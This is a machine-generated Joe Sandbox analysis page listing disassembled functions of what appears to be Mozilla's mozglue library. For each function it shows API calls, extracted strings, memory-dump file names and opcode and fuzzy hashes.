?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CCE2C61

Part of subcall function 6CC94DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC94E5A
Part of subcall function 6CC94DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC94E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCE2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCE2E2D

Part of subcall function 6CCA81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CCA81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6CCE2E3B
expected a Time entry, xrefs: 6CCE2E36
(root), xrefs: 6CCE354F

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: f5480b8cc23c3ed91c2eb77f9294d1a741ae9358792137872f12b066405fff86
Instruction ID: ebe50acafae94020721a487e89ce84a27b0eaf3964498e54cd091cc8ab224353
Opcode Fuzzy Hash: f5480b8cc23c3ed91c2eb77f9294d1a741ae9358792137872f12b066405fff86
Instruction Fuzzy Hash: DF91E1B06087818FD724CF28C49469FB7E5AFCA358F14491DE59A8BB60EB30D949CB52

Function 6CC9D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

, xrefs: 6CC9DA88
@, xrefs: 6CC9DAF6
8, xrefs: 6CC9DC08
9, xrefs: 6CC9DE7F
1, xrefs: 6CC9DBDD
0, xrefs: 6CC9D852
0, xrefs: 6CC9DC7F
-, xrefs: 6CC9D7DD

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: fa42f2cae513e425051ef03d19816e0bdbc0073a6aa02f1ceabe4cc7dde53708
Instruction ID: d4f1044b7da81dd1bcf8a5a567f8e8e62f2d1bb17d40ff1b6072c3e64a44cdfe
Opcode Fuzzy Hash: fa42f2cae513e425051ef03d19816e0bdbc0073a6aa02f1ceabe4cc7dde53708
Instruction Fuzzy Hash: 0762AA7160C3858FD701CE29C09076ABBF2BF86358F184A4DE4E56BA91E335D985CB93

Function 6CC9BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CC9C1CB
__aulldiv.LIBCMT ref: 6CC9C24C
__aulldiv.LIBCMT ref: 6CC9C348
__aullrem.LIBCMT ref: 6CC9C365
__aulldiv.LIBCMT ref: 6CC9C37D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: 1fd4e2e252732dc03e21e02a94ced911bfcaf4ae379119aeb7c6070f073f5e80
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: E9321532B146118FC718DE2CC890A56BBE6AFC9350F09866DE899CB3D5E734ED05CB91

Function 6CD0545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CD08A4B

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: c013ca5c1f43a3c902ec57ad493d62ea182ee3bca7deab30b111ccf608c4e9d2
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: C7B1C572F0121ACBDB14CF6CCC917A9B7B2EF85314F1802A9C989DB791E7309985CB91

Function 6CD0542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CD088F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CD0925C

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 9d2fec48b7b11b3254e4d09f64c6603dd4315626915702778eb85d376246f13e
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 47B1A472F0120ACBDB14CF6CCC816ADB7B2EF85314F150269C949DB795D730A989CB90

Function 6CCD6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6CCD6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCD6E1E

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: a02c47d23ffa6b5847a73acbcc0be7882f5b87927cc7b24c5ca0e955d6961761
Instruction ID: 2e53f74b69a75cc68577d908f1eeb33155bd2850b329aaff873e31701da2446c
Opcode Fuzzy Hash: a02c47d23ffa6b5847a73acbcc0be7882f5b87927cc7b24c5ca0e955d6961761
Instruction Fuzzy Hash: F3A17D706187818FD715CF25C4907AAFBE2BF89308F05495DE58A87B51EB70B849CB92

Function 6CCB4640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6CCB4777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCB5585, 6CCB55A8, 6CCB55C3, 6CCB5624

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 1a20ba7635ba27a67a5175d00d4fa72e3337d1b03eb9884a2a2faba433c8f818
Instruction ID: 46cd399106d30dab05405bc3acccefd88d9ea5d6c87ec98e48e9dc3139427c1c
Opcode Fuzzy Hash: 1a20ba7635ba27a67a5175d00d4fa72e3337d1b03eb9884a2a2faba433c8f818
Instruction Fuzzy Hash: 09B28D71A09A018FD708CF59C590715FBE2BFC5324B29C7ADE46A9B7A5E731E841CB80

Function 6CCF85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CCF8C7C
__aulldiv.LIBCMT ref: 6CCF8DD7

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 30dc85bc0db0c43c59eab8d21972c33e5516688cb2f7e91750839fdfa5cb07b6
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 91327031F001198BDF58CF9DC8A1BAEB7B2FF89300F15852AD516BB790DA349D458B91

Function 6CCD5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6CCA4A63,?,?), ref: 6CCD5F06

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 682aa47e86c94e6effe8ad0b50be820a688ddf3839e01484fc2d2acd14f9c167
Instruction ID: 83debd4dec36e34d5a84658397dbf387e63423c9636b80619831b6121aae6294
Opcode Fuzzy Hash: 682aa47e86c94e6effe8ad0b50be820a688ddf3839e01484fc2d2acd14f9c167
Instruction Fuzzy Hash: D8C1B1B5E012098BCB04CF99C1906EEBBB2FF89318F29415DD9556BB44E732B806CB90

Function 6CD076E3 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: 12c2beceb842e7d65d6da95a5153e73bb39ccfc8fd2bbe6aa2ce231d80dec422
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: F932F871E00619CFCB14CF98C890AADFBB2FF88308F558169C949AB755D731A986CF90

Function 6CCC0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 7b5dd55b54450f99a52670dcee79b3bb467d0c277319c88c6ebcd31247655e7d
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: E12228B5E04619CFDB14CF99C890AADF7B2FF88304F548699D44AA7705D730A986CF81

Function 6CD0AC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2235ba016efe20c0ca3086ca920335e15f96a2ac0c1f21a27cda4b82d79bd1ea
Instruction ID: b2d0efaf6220dc09f1e262cd5e256b5c117e4956f8ce7b5e996486b0b01d6144
Opcode Fuzzy Hash: 2235ba016efe20c0ca3086ca920335e15f96a2ac0c1f21a27cda4b82d79bd1ea
Instruction Fuzzy Hash: A6F11471B087459FD700CF2CC8907AABBE2AFC5318F158A2DE5D8877A1E774D8858792

Function 6CCF55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6CCCE1A5), ref: 6CCF5606
LoadLibraryW.KERNEL32(gdi32,?,6CCCE1A5), ref: 6CCF560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CCF5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CCF563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CCF566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CCF567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CCF5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CCF56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CCF56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CCF56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CCF56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CCF5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CCF572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CCF5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CCF5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CCF577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CCF5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CCF57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CCF57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CCF57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CCF57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CCF57FF

Strings

LoadIconW, xrefs: 6CCF575B
StretchDIBits, xrefs: 6CCF57CC
FillRect, xrefs: 6CCF5729
gdi32, xrefs: 6CCF560A
SetWindowPos, xrefs: 6CCF56F7
GetDpiForWindow, xrefs: 6CCF5690
EnableNonClientDpiScaling, xrefs: 6CCF5666
LoadCursorW, xrefs: 6CCF5774
GetThreadDpiAwarenessContext, xrefs: 6CCF562D
MonitorFromWindow, xrefs: 6CCF578D
GetWindowDC, xrefs: 6CCF5710
ShowWindow, xrefs: 6CCF56DE
GetMonitorInfoW, xrefs: 6CCF57A2
SetWindowLongPtrW, xrefs: 6CCF57B7
ReleaseDC, xrefs: 6CCF5742
CreateSolidBrush, xrefs: 6CCF57E4
AreDpiAwarenessContextsEqual, xrefs: 6CCF5637
CreateWindowExW, xrefs: 6CCF56C5
RegisterClassW, xrefs: 6CCF56AC
user32, xrefs: 6CCF5601
GetSystemMetricsForDpi, xrefs: 6CCF5677
DeleteObject, xrefs: 6CCF57F9

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 91d04dca62491326a8c64f45cb54ae276dec5d95cf26065f0d68fa107788bb8b
Instruction ID: 639f2ce2a34459b327e23b3fe0e7f6666f4dea4695893928817c54c8d4b7bdf3
Opcode Fuzzy Hash: 91d04dca62491326a8c64f45cb54ae276dec5d95cf26065f0d68fa107788bb8b
Instruction Fuzzy Hash: F75163B07157066FFB409F359D4592A3ABDAF06345B118429AB21E2F92FB74C8038F60

Function 6CCDCC00 Relevance: 75.2, APIs: 25, Strings: 25, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CCA582D), ref: 6CCDCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CCA582D), ref: 6CCDCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CD0FE98,?,?,?,?,?,6CCA582D), ref: 6CCDCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CCDCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CCDCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CCDCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CCDCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CCDCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CCDCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CCDCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CCDCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CCDCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CCDCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CCDCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CCDCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CCDCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CCDCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CCDCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CCDCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CCDCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CCDCE8A

Strings

stackwalk, xrefs: 6CCDCCF8
unregisteredthreads, xrefs: 6CCDCE58
fileioall, xrefs: 6CCDCCA8
vchost.exeMemory Compressionsvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost, xrefs: 6CCDCD25
mainthreadio, xrefs: 6CCDCC7C
fileio, xrefs: 6CCDCC92
preferencereads, xrefs: 6CCDCD92
notimerresolutionchange, xrefs: 6CCDCE00
noiostacks, xrefs: 6CCDCCBE
Unrecognized feature "%s"., xrefs: 6CCDCEA0
seqstyle, xrefs: 6CCDCCE6
screenshots, xrefs: 6CCDCCD4
jsallocations, xrefs: 6CCDCD0E
java, xrefs: 6CCDCC37
markersallthreads, xrefs: 6CCDCE42
power, xrefs: 6CCDCE84
nostacksampling, xrefs: 6CCDCD7C
audiocallbacktracing, xrefs: 6CCDCDD4
samplingallthreads, xrefs: 6CCDCE2C
cpuallthreads, xrefs: 6CCDCE16
leaf, xrefs: 6CCDCC66
processcpu, xrefs: 6CCDCE6E
ipcmessages, xrefs: 6CCDCDBE
default, xrefs: 6CCDCC21
nativeallocations, xrefs: 6CCDCDA8

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads$vchost.exeMemory Compressionsvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost
API String ID: 1004003707-2100363591
Opcode ID: aa9d39d085e62f5370bb348a60ab87acc2ca53acea75219d388da146f945de27
Instruction ID: b92d09d77d405cd1db58641acbbc075f5fb310bb036bb704c1379e94b5818cec
Opcode Fuzzy Hash: aa9d39d085e62f5370bb348a60ab87acc2ca53acea75219d388da146f945de27
Instruction Fuzzy Hash: D951A9C1B5522522FA007F1A6D10BAB6645FB5324AF21447EFF09A1EE0FB14B21DC6B7

Function 6CCA4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCA4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CCA44B2,6CD1E21C,6CD1F7F8), ref: 6CCA473E
Part of subcall function 6CCA4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CCA474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CCA44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CCA44D2
InitOnceExecuteOnce.KERNEL32(6CD1F80C,6CC9F240,?,?), ref: 6CCA451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CCA455C
LoadLibraryW.KERNEL32(?), ref: 6CCA4592
InitializeCriticalSection.KERNEL32(6CD1F770), ref: 6CCA45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6CCA45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6CCA45BB
InitOnceExecuteOnce.KERNEL32(6CD1F818,6CC9F240,?,?), ref: 6CCA4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CCA4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6CCA4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6CCA466D
VerSetConditionMask.NTDLL ref: 6CCA469F
VerSetConditionMask.NTDLL ref: 6CCA46AB
VerSetConditionMask.NTDLL ref: 6CCA46B2
VerSetConditionMask.NTDLL ref: 6CCA46B9
VerSetConditionMask.NTDLL ref: 6CCA46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CCA46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6CCA46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CCA46FD

Strings

NativeNtBlockSet_Write, xrefs: 6CCA46F7
